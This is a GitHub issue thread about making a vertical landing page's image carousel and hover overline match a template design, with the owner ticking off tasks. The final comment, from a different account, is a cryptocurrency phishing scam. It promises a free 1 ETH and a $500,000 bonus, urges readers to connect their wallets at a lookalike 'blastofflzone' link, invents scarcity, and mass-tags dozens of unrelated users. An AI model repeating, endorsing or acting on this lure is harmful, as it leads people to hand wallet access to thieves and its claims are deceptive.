### ISSUE TITLE
Update the Image carousel for vertical landing page as per the template design

### ISSUE THREAD

**Issue by emmanuelkiranr** [emmanuelkiranr/iCodeThis-Challenges#3]
The image carousel in the vertical landing page is not the same as the one shown in the below template

Changes to be made:

- [ ] Size of the Image in focus should be increased
- [x] 50% of the next image in the carousel should be viewable in desktop
- [x] Navigating between images should be possible via the dot like icon placed at the bottom
- [x] The overline on hover in the vertical nav should appear at the very top of the anchor, close to the left end of screen as in the template

### Template for referrence
![vertical-landing-template](https://icodethis.com/_next/image?url=%2Fimages%2Fprojects%2Fvertical_landing.png&w=3840&q=75)

**Comment by emmanuelkiranr** [comment]
- [x] There should be a dotted pattern at bottom left and top right of the image container as shown in the image

**Comment by emmanuelkiranr** [comment]
Skipping the 1st task as the size doesn't matter atm.

**Comment by Lirikkk** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
shawntabrizi, @mortdeus, @nowvan, @zhiyzuo, @Dispa1r, @danielrotaermel, @DragonEnergy, @nbfsoftedukasi, @ijhajanellejacob, @Yirvan, @easychen, @abhijitgawai, @kewang, @0xhunya, @kirang89, @evianzhow, @captainAyan, @mapsi, @coffeelabor, @hitesharma, @sp004, @pa-perz, @b0bih, @raulmont, @yeahwangy, @nukr, @michaelstivala, @chocochip13, @TianyuanC, @lakshmantgld, @sagarrajroul, @Pushkoff, @shackra, @00Seben30, @aman-senpai, @rubenoliveros, @sajee, @ittranducloc, @erxn, @a1arredondo, @Devorein, @dickhfchan, @yann-yinn, @alemopi, @kalihman, @chhaosh, @nkev, @kh12e, @cptcrunchy, @ouadie-limouni
